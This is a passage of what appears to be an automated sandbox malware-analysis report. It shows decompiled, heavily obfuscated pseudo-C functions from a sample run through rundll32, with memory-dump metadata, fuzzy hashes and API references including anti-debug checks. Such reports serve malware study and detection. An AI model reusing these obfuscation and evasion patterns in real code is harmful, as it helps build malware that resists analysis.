                                                                                                                          						if(_t280 == 0xd3d1227) {
                                                                                                                          							_t280 = 0x9b6c7ef;
                                                                                                                          							continue;
                                                                                                                          						} else {
                                                                                                                          							if(_t280 == 0xd8aa277) {
                                                                                                                          								E007A9008(_v72, _v128, _v136);
                                                                                                                          							} else {
                                                                                                                          								_t317 = _t280 - 0xdb35d55;
                                                                                                                          								if(_t280 != 0xdb35d55) {
                                                                                                                          									goto L10;
                                                                                                                          								} else {
                                                                                                                          									_push(_v164);
                                                                                                                          									_push(_v132);
                                                                                                                          									_t308 = 0x44;
                                                                                                                          									E00794B61( &_v68, _t308);
                                                                                                                          									_push(_v92);
                                                                                                                          									_v68 = _t308;
                                                                                                                          									_push(_v156);
                                                                                                                          									_t284 = _v76;
                                                                                                                          									_v60 = E007ADCF7(_v76, 0x79173c, _t317);
                                                                                                                          									_t307 = E007ADE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
                                                                                                                          									E0079A8B0(_v144, _v60, _v112);
                                                                                                                          									_t311 =  &(_t311[0x19]);
                                                                                                                          									_t280 = 0xd8aa277;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L13:
                                                                                                                          						return _t307;
                                                                                                                          					}
                                                                                                                          					_t263 = E00794241(_t280, _v120,  &_v72, _a28, _v104);
                                                                                                                          					_t311 =  &(_t311[3]);
                                                                                                                          					__eflags = _t263;
                                                                                                                          					if(_t263 == 0) {
                                                                                                                          						_t280 = 0xcb447d9;
                                                                                                                          						goto L10;
                                                                                                                          					} else {
                                                                                                                          						_t280 = 0xdb35d55;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					goto L13;
                                                                                                                          					L10:
                                                                                                                          					__eflags = _t280 - 0xcb447d9;
                                                                                                                          				} while (_t280 != 0xcb447d9);
                                                                                                                          				goto L13;
                                                                                                                          			}













































                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: T.~$hc$ru$($0$K<
                                                                                                                          • API String ID: 0-2343433060
                                                                                                                          • Opcode ID: dfecaf751c68469c63f122bd6ac3ced4cf44615f3853725add2a6872de16ccf6
                                                                                                                          • Instruction ID: f6e59b37752556ce0e898c8208122abb340ba896b5a458f1c64d5d9c9f70d558
                                                                                                                          • Opcode Fuzzy Hash: dfecaf751c68469c63f122bd6ac3ced4cf44615f3853725add2a6872de16ccf6
                                                                                                                          • Instruction Fuzzy Hash: E4C134725087809FD768CF25C94AA5BFBE1FBD5744F104A1DF29A96260C7B68908CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E00793E3F() {
                                                                                                                          				signed int _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				char _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				void* _t213;
                                                                                                                          				signed int _t214;
                                                                                                                          				void* _t216;
                                                                                                                          				signed int _t222;
                                                                                                                          				intOrPtr _t223;
                                                                                                                          				signed int _t224;
                                                                                                                          				signed int _t225;
                                                                                                                          				signed int _t226;
                                                                                                                          				signed int _t227;
                                                                                                                          				signed int _t228;
                                                                                                                          				signed int _t229;
                                                                                                                          				void* _t230;
                                                                                                                          				void* _t236;
                                                                                                                          				void* _t257;
                                                                                                                          				signed int* _t261;
                                                                                                                          
                                                                                                                          				_t261 =  &_v100;
                                                                                                                          				_v8 = 0xc74bd8;
                                                                                                                          				_v4 = 0;
                                                                                                                          				_v72 = 0x3d4417;
                                                                                                                          				_v72 = _v72 << 8;
                                                                                                                          				_v72 = _v72 + 0xffff33fd;
                                                                                                                          				_v72 = _v72 ^ 0xbd434afc;
                                                                                                                          				_v32 = 0xa9ac19;
                                                                                                                          				_v32 = _v32 + 0x4aca;
                                                                                                                          				_v32 = _v32 ^ 0x00a9f6e1;
                                                                                                                          				_v40 = 0x1f6a8;
                                                                                                                          				_v12 = 0;
                                                                                                                          				_v40 = _v40 * 0x6f;
                                                                                                                          				_t257 = 0xf52a3f4;
                                                                                                                          				_v40 = _v40 ^ 0x00d19880;
                                                                                                                          				_v44 = 0x168b17;
                                                                                                                          				_v44 = _v44 + 0x13a5;
                                                                                                                          				_v44 = _v44 ^ 0x001ee95f;
                                                                                                                          				_v48 = 0xfac2ed;
                                                                                                                          				_v48 = _v48 + 0xffff2a35;
                                                                                                                          				_v48 = _v48 ^ 0x00fbd9f9;
                                                                                                                          				_v92 = 0xc00c53;
                                                                                                                          				_v92 = _v92 + 0xffff1aa9;
                                                                                                                          				_v92 = _v92 + 0xf2d7;
                                                                                                                          				_t225 = 0x68;
                                                                                                                          				_v92 = _v92 / _t225;
                                                                                                                          				_v92 = _v92 ^ 0x0000565c;
                                                                                                                          				_v68 = 0xf2ac97;
                                                                                                                          				_v68 = _v68 ^ 0x99fc0549;
                                                                                                                          				_v68 = _v68 >> 0xf;
                                                                                                                          				_v68 = _v68 ^ 0x000a8804;
                                                                                                                          				_v24 = 0xf89d13;
                                                                                                                          				_t226 = 0x49;
                                                                                                                          				_v24 = _v24 / _t226;
                                                                                                                          				_v24 = _v24 ^ 0x000ed122;
                                                                                                                          				_v96 = 0x9976f7;
                                                                                                                          				_v96 = _v96 >> 0xe;
                                                                                                                          				_v96 = _v96 ^ 0xdd1af6ea;
                                                                                                                          				_v96 = _v96 ^ 0x684d855d;
                                                                                                                          				_v96 = _v96 ^ 0xb5551d4c;
                                                                                                                          				_v28 = 0x12a2d6;
                                                                                                                          				_t227 = 0xe;
                                                                                                                          				_v28 = _v28 * 0x29;
                                                                                                                          				_v28 = _v28 ^ 0x02ffade5;
                                                                                                                          				_v100 = 0x1d8880;
                                                                                                                          				_v100 = _v100 + 0x8a1e;
                                                                                                                          				_v100 = _v100 * 0x7c;
                                                                                                                          				_v100 = _v100 + 0xffff421a;
                                                                                                                          				_v100 = _v100 ^ 0x0e9f1559;
                                                                                                                          				_v36 = 0x784079;
                                                                                                                          				_v36 = _v36 / _t227;
                                                                                                                          				_v36 = _v36 ^ 0x0007caf6;
                                                                                                                          				_v60 = 0xd037f8;
                                                                                                                          				_v60 = _v60 >> 0xf;
                                                                                                                          				_v60 = _v60 + 0xfffff3b4;
                                                                                                                          				_v60 = _v60 ^ 0xfff3df4e;
                                                                                                                          				_v64 = 0x95f516;
                                                                                                                          				_v64 = _v64 + 0xffffc55a;
                                                                                                                          				_v64 = _v64 | 0x523f0ae6;
                                                                                                                          				_v64 = _v64 ^ 0x52b19695;
                                                                                                                          				_v84 = 0x271827;
                                                                                                                          				_v84 = _v84 + 0xffff7017;
                                                                                                                          				_v84 = _v84 + 0x1e15;
                                                                                                                          				_v84 = _v84 ^ 0xa1c53b6b;
                                                                                                                          				_v84 = _v84 ^ 0xa1e64a9e;
                                                                                                                          				_v52 = 0x3d5883;
                                                                                                                          				_v52 = _v52 >> 5;
                                                                                                                          				_v52 = _v52 << 3;
                                                                                                                          				_v52 = _v52 ^ 0x000b56f4;
                                                                                                                          				_v56 = 0xd5acf2;
                                                                                                                          				_v56 = _v56 ^ 0x15c9a5cd;
                                                                                                                          				_v56 = _v56 << 3;
                                                                                                                          				_v56 = _v56 ^ 0xa8e6808a;
                                                                                                                          				_v88 = 0xcc2476;
                                                                                                                          				_v88 = _v88 + 0x4ceb;
                                                                                                                          				_v88 = _v88 ^ 0xdbab884b;
                                                                                                                          				_t228 = 0x4f;
                                                                                                                          				_v88 = _v88 / _t228;
                                                                                                                          				_v88 = _v88 ^ 0x02ce2d39;
                                                                                                                          				_v20 = 0x9b21e;
                                                                                                                          				_v20 = _v20 + 0x218b;
                                                                                                                          				_v20 = _v20 ^ 0x00037084;
                                                                                                                          				_v76 = 0xcba48;
                                                                                                                          				_t229 = 0x5a;
                                                                                                                          				_t222 = _v12;
                                                                                                                          				_v76 = _v76 * 0x7b;
                                                                                                                          				_v76 = _v76 + 0x3acc;
                                                                                                                          				_v76 = _v76 << 0x10;
                                                                                                                          				_v76 = _v76 ^ 0xbb6cb0a9;
                                                                                                                          				_v80 = 0x9c886e;
                                                                                                                          				_v80 = _v80 ^ 0x88757b42;
                                                                                                                          				_t230 = 0x5c;
                                                                                                                          				_v80 = _v80 / _t229;
                                                                                                                          				_v80 = _v80 << 0xe;
                                                                                                                          				_v80 = _v80 ^ 0x5c6ae118;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t213 = 0xa360d2e;
                                                                                                                          					do {
                                                                                                                          						while(_t257 != _t213) {
                                                                                                                          							if(_t257 == 0xb87cfc3) {
                                                                                                                          								_t223 =  *0x7b3e10; // 0x0
                                                                                                                          								_t224 = _t223 + 0x1c;
                                                                                                                          								while(1) {
                                                                                                                          									__eflags =  *_t224 - _t230;
                                                                                                                          									if(__eflags == 0) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									_t224 = _t224 + 2;
                                                                                                                          									__eflags = _t224;
                                                                                                                          								}
                                                                                                                          								_t222 = _t224 + 2;
                                                                                                                          								_t257 = 0xc7301de;
                                                                                                                          								goto L1;
                                                                                                                          							} else {
                                                                                                                          								if(_t257 == 0xc7301de) {
                                                                                                                          									_push(_v48);
                                                                                                                          									_push(_v44);
                                                                                                                          									_t216 = E007ADCF7(_v40, 0x791080, __eflags);
                                                                                                                          									_pop(_t236);
                                                                                                                          									__eflags = E0079AAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
                                                                                                                          									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
                                                                                                                          									E0079A8B0(_v60, _t216, _v64);
                                                                                                                          									_t261 =  &(_t261[0xf]);
                                                                                                                          									L14:
                                                                                                                          									_t213 = 0xa360d2e;
                                                                                                                          									_t230 = 0x5c;
                                                                                                                          									goto L15;
                                                                                                                          								} else {
                                                                                                                          									if(_t257 == 0xdd28c3f) {
                                                                                                                          										E00791FD1(_v20, _v76, _v80, _v16);
                                                                                                                          									} else {
                                                                                                                          										if(_t257 != 0xf52a3f4) {
                                                                                                                          											goto L15;
                                                                                                                          										} else {
                                                                                                                          											_t257 = 0xb87cfc3;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L18:
                                                                                                                          							return _v12;
                                                                                                                          						}
                                                                                                                          						_t214 = E00791F53(_v16, _v84, _v52, _t222, _v56, _v88);
                                                                                                                          						_t261 =  &(_t261[4]);
                                                                                                                          						__eflags = _t214;
                                                                                                                          						_t257 = 0xdd28c3f;
                                                                                                                          						_t191 = _t214 == 0;
                                                                                                                          						__eflags = _t191;
                                                                                                                          						_v12 = 0 | _t191;
                                                                                                                          						goto L14;
                                                                                                                          						L15:
                                                                                                                          						__eflags = _t257 - 0x57f878b;
                                                                                                                          					} while (__eflags != 0);
                                                                                                                          					goto L18;
                                                                                                                          				}
                                                                                                                          			}











































                                                                                                                          0x00794038
                                                                                                                          0x00794040
                                                                                                                          0x00794045
                                                                                                                          0x0079404a
                                                                                                                          0x00794052
                                                                                                                          0x0079405a
                                                                                                                          0x00794062
                                                                                                                          0x00794067
                                                                                                                          0x0079406f
                                                                                                                          0x00794077
                                                                                                                          0x0079407f
                                                                                                                          0x0079408d
                                                                                                                          0x00794092
                                                                                                                          0x00794098
                                                                                                                          0x007940a0
                                                                                                                          0x007940a8
                                                                                                                          0x007940b0
                                                                                                                          0x007940b8
                                                                                                                          0x007940c5
                                                                                                                          0x007940c6
                                                                                                                          0x007940cc
                                                                                                                          0x007940d0
                                                                                                                          0x007940d8
                                                                                                                          0x007940dd
                                                                                                                          0x007940e5
                                                                                                                          0x007940ed
                                                                                                                          0x007940fb
                                                                                                                          0x007940fc
                                                                                                                          0x00794100
                                                                                                                          0x00794105
                                                                                                                          0x0079410d
                                                                                                                          0x0079410d
                                                                                                                          0x0079410d
                                                                                                                          0x00794112
                                                                                                                          0x00794112
                                                                                                                          0x0079411c
                                                                                                                          0x007941bb
                                                                                                                          0x007941c1
                                                                                                                          0x007941c9
                                                                                                                          0x007941c9
                                                                                                                          0x007941cc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007941c6
                                                                                                                          0x007941c6
                                                                                                                          0x007941c6
                                                                                                                          0x007941ce
                                                                                                                          0x007941d1
                                                                                                                          0x00000000
                                                                                                                          0x00794122
                                                                                                                          0x00794128
                                                                                                                          0x00794146
                                                                                                                          0x0079414f
                                                                                                                          0x00794157
                                                                                                                          0x0079415d
                                                                                                                          0x007941a0
                                                                                                                          0x007941ae
                                                                                                                          0x007941b1
                                                                                                                          0x007941b6
                                                                                                                          0x00794208
                                                                                                                          0x0079420a
                                                                                                                          0x0079420f
                                                                                                                          0x00000000
                                                                                                                          0x0079412a
                                                                                                                          0x00794130
                                                                                                                          0x0079422e
                                                                                                                          0x00794136
                                                                                                                          0x0079413c
                                                                                                                          0x00000000
                                                                                                                          0x00794142
                                                                                                                          0x00794142
                                                                                                                          0x00000000
                                                                                                                          0x00794142
                                                                                                                          0x0079413c
                                                                                                                          0x00794130
                                                                                                                          0x00794128
                                                                                                                          0x00794235
                                                                                                                          0x00794240
                                                                                                                          0x00794240
                                                                                                                          0x007941f0
                                                                                                                          0x007941f7
                                                                                                                          0x007941fa
                                                                                                                          0x007941fc
                                                                                                                          0x00794201
                                                                                                                          0x00794201
                                                                                                                          0x00794204
                                                                                                                          0x00000000
                                                                                                                          0x00794210
                                                                                                                          0x00794210
                                                                                                                          0x00794210
                                                                                                                          0x00000000
                                                                                                                          0x0079421c

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: .6$.6$.6$y@x$?R$L
                                                                                                                          • API String ID: 0-3177096336
                                                                                                                          • Opcode ID: 24da77cfbb762901e6037609256032b937e94a7afb19334b7784b5f6e904188a
                                                                                                                          • Instruction ID: 3644c31bde0c7728bd48e5bcf87933ef3d4c0152ddb025fe3c6706f2acd200c3
                                                                                                                          • Opcode Fuzzy Hash: 24da77cfbb762901e6037609256032b937e94a7afb19334b7784b5f6e904188a
                                                                                                                          • Instruction Fuzzy Hash: CDA130B25083409FD758CF65D88A81BBBF1FBD4758F108A1DF19586260D3B5894ACF87
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E0079B74D(void* __ecx, void* __edx) {
                                                                                                                          				signed int _v4;
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				void* _t231;
                                                                                                                          				intOrPtr _t232;
                                                                                                                          				intOrPtr _t233;
                                                                                                                          				void* _t237;
                                                                                                                          				signed int _t239;
                                                                                                                          				signed int _t240;
                                                                                                                          				signed int _t241;
                                                                                                                          				signed int _t242;
                                                                                                                          				void* _t266;
                                                                                                                          				void* _t267;
                                                                                                                          				signed int* _t270;
                                                                                                                          				signed int* _t271;
                                                                                                                          
                                                                                                                          				_t270 =  &_v104;
                                                                                                                          				_v4 = _v4 & 0x00000000;
                                                                                                                          				_v12 = 0x6c2b32;
                                                                                                                          				_v8 = 0x58b11;
                                                                                                                          				_v64 = 0x37f8ee;
                                                                                                                          				_v64 = _v64 + 0xffff6702;
                                                                                                                          				_v64 = _v64 ^ 0xad40df3f;
                                                                                                                          				_v64 = _v64 ^ 0xad79282c;
                                                                                                                          				_v100 = 0x6d524;
                                                                                                                          				_v100 = _v100 >> 0xf;
                                                                                                                          				_v100 = _v100 + 0x2921;
                                                                                                                          				_v100 = _v100 >> 6;
                                                                                                                          				_v100 = _v100 ^ 0x00050ee9;
                                                                                                                          				_v28 = 0x9e9a;
                                                                                                                          				_t266 = __edx;
                                                                                                                          				_t237 = __ecx;
                                                                                                                          				_t267 = 0x52ffaa2;
                                                                                                                          				_t239 = 0xb;
                                                                                                                          				_v28 = _v28 / _t239;
                                                                                                                          				_v28 = _v28 ^ 0x00028e70;
                                                                                                                          				_v32 = 0x2476b5;
                                                                                                                          				_t240 = 0x6f;
                                                                                                                          				_v32 = _v32 / _t240;
                                                                                                                          				_v32 = _v32 ^ 0x0008b44d;
                                                                                                                          				_v60 = 0x9e7d2d;
                                                                                                                          				_v60 = _v60 >> 0xc;
                                                                                                                          				_v60 = _v60 << 0xe;
                                                                                                                          				_v60 = _v60 ^ 0x02752993;
                                                                                                                          				_v24 = 0xe09194;
                                                                                                                          				_t241 = 0x44;
                                                                                                                          				_v24 = _v24 / _t241;
                                                                                                                          				_v24 = _v24 ^ 0x0009703f;
                                                                                                                          				_v96 = 0x854eb1;
                                                                                                                          				_v96 = _v96 + 0xc1c6;
                                                                                                                          				_v96 = _v96 * 0x1a;
                                                                                                                          				_v96 = _v96 | 0x594c04b7;
                                                                                                                          				_v96 = _v96 ^ 0x5dd9e9b5;
                                                                                                                          				_v20 = 0x86d30b;
                                                                                                                          				_v20 = _v20 | 0xe45dff90;
                                                                                                                          				_v20 = _v20 ^ 0xe4d4624e;
                                                                                                                          				_v92 = 0x8501b9;
                                                                                                                          				_v92 = _v92 >> 6;
                                                                                                                          				_v92 = _v92 * 0x2f;
                                                                                                                          				_v92 = _v92 + 0xe9ed;
                                                                                                                          				_v92 = _v92 ^ 0x0060653e;
                                                                                                                          				_v52 = 0xaa921f;
                                                                                                                          				_v52 = _v52 ^ 0x3dfd2146;
                                                                                                                          				_v52 = _v52 >> 1;
                                                                                                                          				_v52 = _v52 ^ 0x1ea8ab64;
                                                                                                                          				_v56 = 0x2765e6;
                                                                                                                          				_v56 = _v56 ^ 0x5c8ea534;
                                                                                                                          				_v56 = _v56 | 0xccee86e2;
                                                                                                                          				_v56 = _v56 ^ 0xdcebf872;
                                                                                                                          				_v88 = 0x89b797;
                                                                                                                          				_v88 = _v88 + 0x84ba;
                                                                                                                          				_v88 = _v88 + 0xc14;
                                                                                                                          				_v88 = _v88 | 0xbe23ba3f;
                                                                                                                          				_v88 = _v88 ^ 0xbea6e118;
                                                                                                                          				_v48 = 0x866a1d;
                                                                                                                          				_v48 = _v48 >> 9;
                                                                                                                          				_v48 = _v48 * 0x16;
                                                                                                                          				_v48 = _v48 ^ 0x0007ec78;
                                                                                                                          				_v16 = 0x7d5d8a;
                                                                                                                          				_v16 = _v16 >> 8;
                                                                                                                          				_v16 = _v16 ^ 0x000578c4;
                                                                                                                          				_v68 = 0x2c77b1;
                                                                                                                          				_v68 = _v68 | 0xad369f51;
                                                                                                                          				_v68 = _v68 << 0xd;
                                                                                                                          				_v68 = _v68 ^ 0xdff48475;
                                                                                                                          				_v72 = 0x3ef83;
                                                                                                                          				_v72 = _v72 << 3;
                                                                                                                          				_v72 = _v72 + 0xb46;
                                                                                                                          				_v72 = _v72 ^ 0x001ba742;
                                                                                                                          				_v76 = 0x4a0f2c;
                                                                                                                          				_t242 = 0x6a;
                                                                                                                          				_v76 = _v76 * 0x54;
                                                                                                                          				_v76 = _v76 << 0xa;
                                                                                                                          				_v76 = _v76 ^ 0x33e29f20;
                                                                                                                          				_v36 = 0x9fb368;
                                                                                                                          				_v36 = _v36 >> 0xb;
                                                                                                                          				_v36 = _v36 ^ 0x000f389a;
                                                                                                                          				_v40 = 0x5cfe3a;
                                                                                                                          				_v40 = _v40 + 0x27ff;
                                                                                                                          				_v40 = _v40 ^ 0x005ee30c;
                                                                                                                          				_v104 = 0xfd26ea;
                                                                                                                          				_v104 = _v104 << 9;
                                                                                                                          				_v104 = _v104 + 0xffff1095;
                                                                                                                          				_v104 = _v104 + 0xffffd24c;
                                                                                                                          				_v104 = _v104 ^ 0xfa4b2973;
                                                                                                                          				_v80 = 0xbb493f;
                                                                                                                          				_v80 = _v80 + 0x4ae2;
                                                                                                                          				_v80 = _v80 | 0xbb4dbcb8;
                                                                                                                          				_v80 = _v80 + 0x3bc7;
                                                                                                                          				_v80 = _v80 ^ 0xbbf0b3fa;
                                                                                                                          				_v44 = 0xfc3c2e;
                                                                                                                          				_v44 = _v44 << 0x10;
                                                                                                                          				_v44 = _v44 + 0xffff4208;
                                                                                                                          				_v44 = _v44 ^ 0x3c281d99;
                                                                                                                          				_v84 = 0xc50344;
                                                                                                                          				_v84 = _v84 | 0xb9ed19f4;
                                                                                                                          				_v84 = _v84 / _t242;
                                                                                                                          				_t243 = 0x6b;
                                                                                                                          				_v84 = _v84 / _t243;
                                                                                                                          				_v84 = _v84 ^ 0x000f16db;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t231 = 0xc3f018b;
                                                                                                                          					do {
                                                                                                                          						L2:
                                                                                                                          						while(_t267 != 0x52ffaa2) {
                                                                                                                          							if(_t267 == 0x865547f) {
                                                                                                                          								_t243 = _v88;
                                                                                                                          								_t232 = E0079CDAE(_v88, _v48, _v16,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                          								_t270 =  &(_t270[2]);
                                                                                                                          								 *((intOrPtr*)(_t266 + 0x1c)) = _t232;
                                                                                                                          								__eflags = _t232;
                                                                                                                          								_t231 = 0xc3f018b;
                                                                                                                          								_t267 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							if(_t267 == 0xb133873) {
                                                                                                                          								_push(_v32);
                                                                                                                          								_t233 = E007AC3A0(_t237, _v64, __eflags, _v100, _v28, _t243);
                                                                                                                          								_t271 =  &(_t270[4]);
                                                                                                                          								 *((intOrPtr*)(_t266 + 0x38)) = _t233;
                                                                                                                          								__eflags = _t233;
                                                                                                                          								if(_t233 != 0) {
                                                                                                                          									E00797B8B( *((intOrPtr*)(_t266 + 0x38)), _v60,  *((intOrPtr*)(_t266 + 0x38)), _v24, _v96);
                                                                                                                          									_push( *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                          									_push(_v56);
                                                                                                                          									_push(_v52);
                                                                                                                          									_t243 = _v20;
                                                                                                                          									E00797C37(_v20, _v92);
                                                                                                                          									_t270 =  &(_t271[6]);
                                                                                                                          									_t267 = 0x865547f;
                                                                                                                          									goto L1;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_t267 == 0xb7a2405) {
                                                                                                                          									return E007A9E56(_v80, _v44, _v84,  *((intOrPtr*)(_t266 + 0x38)));
                                                                                                                          								}
                                                                                                                          								if(_t267 != _t231) {
                                                                                                                          									goto L13;
                                                                                                                          								} else {
                                                                                                                          									_t233 = E007946BE(_t243, _v68, _t243, _v72, _t243, _v76, _v36, _v40, _t243, _t266, E00794C5D, _v104);
                                                                                                                          									_t270 =  &(_t270[0xa]);
                                                                                                                          									 *((intOrPtr*)(_t266 + 0x2c)) = _t233;
                                                                                                                          									if(_t233 == 0) {
                                                                                                                          										_t267 = 0xb7a2405;
                                                                                                                          										while(1) {
                                                                                                                          											L1:
                                                                                                                          											_t231 = 0xc3f018b;
                                                                                                                          											goto L2;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							return _t233;
                                                                                                                          						}
                                                                                                                          						_t267 = 0xb133873;
                                                                                                                          						L13:
                                                                                                                          						__eflags = _t267 - 0x1aeb2e;
                                                                                                                          					} while (__eflags != 0);
                                                                                                                          					return _t231;
                                                                                                                          				}
                                                                                                                          			}









































                                                                                                                          0x0079ba78
                                                                                                                          0x0079ba7a
                                                                                                                          0x00000000
                                                                                                                          0x0079bb75
                                                                                                                          0x0079ba82
                                                                                                                          0x00000000
                                                                                                                          0x0079ba88
                                                                                                                          0x0079baa9
                                                                                                                          0x0079baae
                                                                                                                          0x0079bab1
                                                                                                                          0x0079bab6
                                                                                                                          0x0079babc
                                                                                                                          0x0079ba53
                                                                                                                          0x0079ba53
                                                                                                                          0x0079ba53
                                                                                                                          0x00000000
                                                                                                                          0x0079ba53
                                                                                                                          0x0079ba53
                                                                                                                          0x0079bab6
                                                                                                                          0x0079ba82
                                                                                                                          0x0079bb7d
                                                                                                                          0x0079bb7d
                                                                                                                          0x0079bb4d
                                                                                                                          0x0079bb52
                                                                                                                          0x0079bb52
                                                                                                                          0x0079bb52
                                                                                                                          0x00000000
                                                                                                                          0x0079ba58

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !)$2+l$>e`$?p$J$e'
                                                                                                                          • API String ID: 0-1675410552
                                                                                                                          • Opcode ID: 03d9d8a06b86b826e2fc3bbbde3b68ffc0bda5e59632d46a4252074f250338d7
                                                                                                                          • Instruction ID: 090b521ca73fa8fc03777e35bd894649cd2d6a76d0fc0c986bb527b9219e8a48
                                                                                                                          • Opcode Fuzzy Hash: 03d9d8a06b86b826e2fc3bbbde3b68ffc0bda5e59632d46a4252074f250338d7
                                                                                                                          • Instruction Fuzzy Hash: 1FB130724083409FC758CF65D58A40BFBE2FBD5758F108A1CF58A96260D3B9CA59CF86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 100357B5
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 100357CA
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(10049C70), ref: 100357D5
                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 100357F1
                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 100357F8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2579439406-0
                                                                                                                          • Opcode ID: 8c939c2efb241c6fb0af2f27818b77021c2f68401b871af98be5750efaca2114
